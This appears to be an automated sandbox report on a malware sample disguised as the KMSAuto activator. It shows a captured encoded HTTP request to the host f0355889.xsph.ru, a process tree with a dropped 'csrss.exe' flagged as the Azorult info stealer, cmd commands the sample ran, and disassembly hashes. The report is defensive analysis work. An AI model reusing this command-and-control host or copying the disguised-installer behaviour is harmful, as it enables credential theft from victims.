                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                  Host: f0355889.xsph.ru
                                                                  Content-Length: 107
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 48 ed 3e 3e ed 3e 32 ed 3e 3d ed 3e 3d ed 3e 33 89 28 38 8c 28 39 fa 28 39 f8 28 39 f1 28 39 f1 4f 2f fb 3d 4e ed 3e 3a ed 3e 3c
                                                                  Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KH>>>2>=>=>3(8(9(9(9(9O/=N>:><
                                                                  Mar 25, 2023 14:27:06.708403111 CET94INHTTP/1.1 404 Not Found
                                                                  Server: openresty
                                                                  Date: Sat, 25 Mar 2023 13:27:06 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 65 30 39 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77
                                                                  Data Ascii: e094<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4040</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}.w
                                                                  Mar 25, 2023 14:27:06.708455086 CET96INData Raw: 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 68 65 69 67 68 74 3a 34 35 30 70 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65
                                                                  Data Ascii: rapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:ve
                                                                  Mar 25, 2023 14:27:06.708503008 CET97INData Raw: 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 69 67 68 74 2d 73 69 64 65 20 2e 69 6d 61 67 65 2d 63 6f
                                                                  Data Ascii: de{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;heig
                                                                  Mar 25, 2023 14:27:06.708548069 CET98INData Raw: 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67 68 74 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b
                                                                  Data Ascii: e-space:pre-line}.wrapper .content .footer__rights{font-size:10px;font-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-lef
                                                                  Mar 25, 2023 14:27:06.708592892 CET100INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 34 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20
                                                                  Data Ascii: <p class="error-block__name"> <b>4040</b></p> <p class="error-block__en">Error 4040. <b> Domain not found on server.</b></p> <h
                                                                  Mar 25, 2023 14:27:06.708640099 CET101INData Raw: 37 33 37 37 43 31 38 30 2e 32 32 36 20 37 33 2e 32 36 35 33 20 31 38 35 2e 31 39 39 20 37 34 2e 36 30 32 20 31 38 39 2e 39 38 20 37 33 2e 30 37 34 33 43 31 39 33 2e 38 30 36 20 37 31 2e 39 32 38 36 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34
                                                                  Data Ascii: 7377C180.226 73.2653 185.199 74.602 189.98 73.0743C193.806 71.9286 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.99
                                                                  Mar 25, 2023 14:27:06.708688021 CET103INData Raw: 2e 37 32 36 43 31 33 37 2e 33 38 33 20 31 30 33 2e 34 33 35 20 31 34 30 2e 30 36 20 31 30 30 2e 39 35 32 20 31 34 32 2e 35 34 37 20 39 38 2e 34 36 39 38 43 31 34 33 2e 35 30 33 20 39 37 2e 35 31 35 20 31 34 32 2e 31 36 34 20 39 36 2e 31 37 38 34
                                                                  Data Ascii: .726C137.383 103.435 140.06 100.952 142.547 98.4698C143.503 97.515 142.164 96.1784 141.208 97.1331Z" fill="black"/> <path d="M139.104 92.3605L128.393 95.6066C127.245 95.9885 127.628 97.7071 128.967 97.5161C132.601 96.3704 136.235 95.41
                                                                  Mar 25, 2023 14:27:06.708733082 CET104INData Raw: 2e 31 31 20 32 39 34 2e 34 31 31 20 31 30 36 2e 31 31 43 32 39 35 2e 31 37 36 20 31 30 34 2e 33 39 31 20 32 39 36 2e 33 32 34 20 31 30 32 2e 32 39 31 20 32 39 34 2e 39 38 35 20 31 30 30 2e 35 37 32 43 32 39 34 2e 36 30 32 20 39 39 2e 39 39 39 31
                                                                  Data Ascii: .11 294.411 106.11C295.176 104.391 296.324 102.291 294.985 100.572C294.602 99.9991 294.029 99.9991 293.455 100.381C290.395 103.436 287.143 106.491 284.083 109.547C283.892 109.738 260.749 128.26 251.568 139.717C247.36 137.043 243.152 134.561 23
                                                                  Mar 25, 2023 14:27:06.708779097 CET105INData Raw: 30 37 35 20 35 33 2e 39 38 30 31 43 35 37 2e 32 34 32 34 20 35 34 2e 31 37 31 31 20 35 37 2e 30 35 31 32 20 35 35 2e 31 32 35 38 20 35 37 2e 36 32 35 20 35 35 2e 35 30 37 37 43 36 33 2e 33 36 32 39 20 36 31 2e 34 32 37 32 20 36 39 2e 31 30 30 39
                                                                  Data Ascii: 075 53.9801C57.2424 54.1711 57.0512 55.1258 57.625 55.5077C63.3629 61.4272 69.1009 67.3466 75.0301 73.2661C80.1943 78.4217 85.5497 83.1955 91.6702 87.2055C94.7304 89.115 97.9819 90.8335 101.425 92.1702C103.146 102.481 105.059 112.984 109.649 1
                                                                  Mar 25, 2023 14:27:06.708825111 CET107INData Raw: 37 37 20 31 32 35 2e 35 38 36 43 31 32 2e 31 30 33 39 20 31 32 35 2e 37 37 37 20 31 31 2e 33 33 38 38 20 31 32 36 2e 31 35 39 20 31 30 2e 39 35 36 33 20 31 32 36 2e 37 33 32 43 31 30 2e 35 37 33 38 20 31 32 37 2e 33 30 35 20 31 30 2e 35 37 33 38
                                                                  Data Ascii: 77 125.586C12.1039 125.777 11.3388 126.159 10.9563 126.732C10.5738 127.305 10.5738 128.069 10.9563 128.833C11.3388 129.405 12.1039 129.787 12.6777 130.169C13.0602 130.551 13.634 130.742 14.0165 130.933C12.1039 131.506 10.3825 132.843 9.61744 1
                                                                  Mar 25, 2023 14:27:06.769632101 CET108INData Raw: 33 30 39 2e 38 35 33 43 36 37 2e 31 38 38 32 20 33 31 31 2e 35 37 32 20 36 31 2e 36 34 31 35 20 33 31 33 2e 36 37 32 20 36 30 2e 36 38 35 32 20 33 31 39 2e 30 31 39 43 35 39 2e 37 32 38 39 20 33 32 33 2e 36 30 32 20 36 33 2e 35 35 34 32 20 33 32
                                                                  Data Ascii: 309.853C67.1882 311.572 61.6415 313.672 60.6852 319.019C59.7289 323.602 63.5542 326.848 67.5708 328.185C72.9262 329.903 79.0467 329.139 84.4021 327.803C89.5662 326.466 94.5391 324.748 99.1295 322.265C108.501 317.682 116.726 311.19 123.42 303.1


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:14:27:01
                                                                  Start date:25/03/2023
                                                                  Path:C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
                                                                  Imagebase:0x400000
                                                                  File size:8425933 bytes
                                                                  MD5 hash:1AC70328CE1DEA448647022C5B360A67
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:1
                                                                  Start time:14:27:04
                                                                  Start date:25/03/2023
                                                                  Path:C:\Users\user\AppData\Roaming\csrss.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\csrss.exe" /nc /s
                                                                  Imagebase:0x400000
                                                                  File size:5027840 bytes
                                                                  MD5 hash:2A0C555C70EB25094C94E4BA5A6BA131
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: unknown
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 67%, ReversingLabs
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:2
                                                                  Start time:14:27:04
                                                                  Start date:25/03/2023
                                                                  Path:C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe" /nc
                                                                  Imagebase:0x10000
                                                                  File size:8767160 bytes
                                                                  MD5 hash:2FB86BE791B4BB4389E55DF0FEC04EB7
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 71%, ReversingLabs
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:4
                                                                  Start time:14:27:06
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1136
                                                                  Imagebase:0xd60000
                                                                  File size:434592 bytes
                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:12
                                                                  Start time:14:27:22
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c md "C:\Users\user\AppData\Local\MSfree Inc"
                                                                  Imagebase:0xb0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:15
                                                                  Start time:14:27:22
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff745070000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:16
                                                                  Start time:14:27:26
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c echo test>>"C:\Program Files (x86)\KMSAuto\KMSAuto Net\test.test"
                                                                  Imagebase:0xb0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:17
                                                                  Start time:14:27:26
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff745070000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:18
                                                                  Start time:14:27:26
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test"
                                                                  Imagebase:0x7ff707bb0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:19
                                                                  Start time:14:27:26
                                                                  Start date:25/03/2023
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff745070000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Reset < >

                                                                    Non-executed Functions

                                                                    Function 046C1087 Relevance: .5, Instructions: 481COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b9c995dac3923caa1844a63bb3f2947c039c349f74f887706196c77cedc66c67
                                                                    • Instruction ID: e40bfa1d0a6b044a8fcde5966f98a515bf3114ac2530f6f2bda653c43d065662
                                                                    • Opcode Fuzzy Hash: b9c995dac3923caa1844a63bb3f2947c039c349f74f887706196c77cedc66c67
                                                                    • Instruction Fuzzy Hash: 24022772B042218BD708CE18C4902BDBBE2FBC5345F154A3EF59697A86E774E884CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 046C3B07 Relevance: .3, Instructions: 300COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce8d286d1523e8950fc12ac4b8cd7b5ce741b602c791c303a6bfb49191d7ac93
                                                                    • Instruction ID: 748e40044e32f92cdfd9f1eaf8fd1d0b3b7355d1d04052036a195310ced6c53f
                                                                    • Opcode Fuzzy Hash: ce8d286d1523e8950fc12ac4b8cd7b5ce741b602c791c303a6bfb49191d7ac93
                                                                    • Instruction Fuzzy Hash: 55D1C1B2A58A664FD364DF49DC802357762AFC8200F9B067DC66407363CA78F953DBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 046C31E7 Relevance: .2, Instructions: 212COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b65dd5cc14a9fce525a6856849c7e0cb13a5ff6bafc99ec235d207119c379bd
                                                                    • Instruction ID: 2f79b6cbf95d27c57ddec0c3ef75ff1c277802ac6e64d19b209ae31762c648a5
                                                                    • Opcode Fuzzy Hash: 9b65dd5cc14a9fce525a6856849c7e0cb13a5ff6bafc99ec235d207119c379bd
                                                                    • Instruction Fuzzy Hash: 1A917DB29083658FC315DF49D88455AF7E1BFD4304F0B86AEE9985B322E270A945CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 046C2FE7 Relevance: .2, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: db2813f2793a401f57ef1f057e374387a95f5094451eb2922e501202bfc2a8db
                                                                    • Instruction ID: 8f3c2584de6225e94368c1838399da06e760d8afd7a5d8bc2a22460a55e52d80
                                                                    • Opcode Fuzzy Hash: db2813f2793a401f57ef1f057e374387a95f5094451eb2922e501202bfc2a8db
                                                                    • Instruction Fuzzy Hash: 206149726087118FC318DF49D48494AF3E1FFC8328F168A6DEA885B361D771E959CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 046C3597 Relevance: .2, Instructions: 156COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f439fddda1cff378aa7405ded2eec4dbc5bcc2cb1461a5db01c36286a516767
                                                                    • Instruction ID: 61ec7da891ac379a079c4cada1c54a3c951e7f08e9cfa06a59bad265c7ae26eb
                                                                    • Opcode Fuzzy Hash: 4f439fddda1cff378aa7405ded2eec4dbc5bcc2cb1461a5db01c36286a516767
                                                                    • Instruction Fuzzy Hash: 7A61735510DBD59AC326CF3988901A5FFF1AE67001708879DE8E543F86C268F6A8CBF1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 046BF8FF Relevance: .1, Instructions: 140COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 799d1115dc2863312a6815c420eb3dd35bfefad0a364759f5b8cc872ca117984
                                                                    • Instruction ID: 8458d4d4d269ca468090b602944776c6948db0dcb526dbd5a8198f63e6d3541e
                                                                    • Opcode Fuzzy Hash: 799d1115dc2863312a6815c420eb3dd35bfefad0a364759f5b8cc872ca117984
                                                                    • Instruction Fuzzy Hash: E841D471B50A200AB318CF268C841A62BD3DBCA386795C23CC561C66DDDEBDC057C6A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 046C3947 Relevance: .1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: da58cda1e4a3e41df5831c516bb8b01ca1fa6d25def6b220089d14d8ce8e8937
                                                                    • Instruction ID: 727ecf8a08318eff18c6e3e90a6dd58bf46e21329c404715613e8378649f1e35
                                                                    • Opcode Fuzzy Hash: da58cda1e4a3e41df5831c516bb8b01ca1fa6d25def6b220089d14d8ce8e8937
                                                                    • Instruction Fuzzy Hash: F3312B72B087A646E310AE1E8C40135BB93EFC1111F59C7BDD8944BB4AE935A592C7B0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 046C502A Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                    • Instruction ID: f83d5bf9d57220e134c0efa5b8faa546837d28f5af661a832ae9dcaf1d96617f
                                                                    • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                    • Instruction Fuzzy Hash: 67418061814B9653EB234F7CC882272B320BFAB244F00D76AFDD1B9962FB326544A651
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 046C4887 Relevance: .1, Instructions: 80COMMON
                                                                    Download Yara Rule
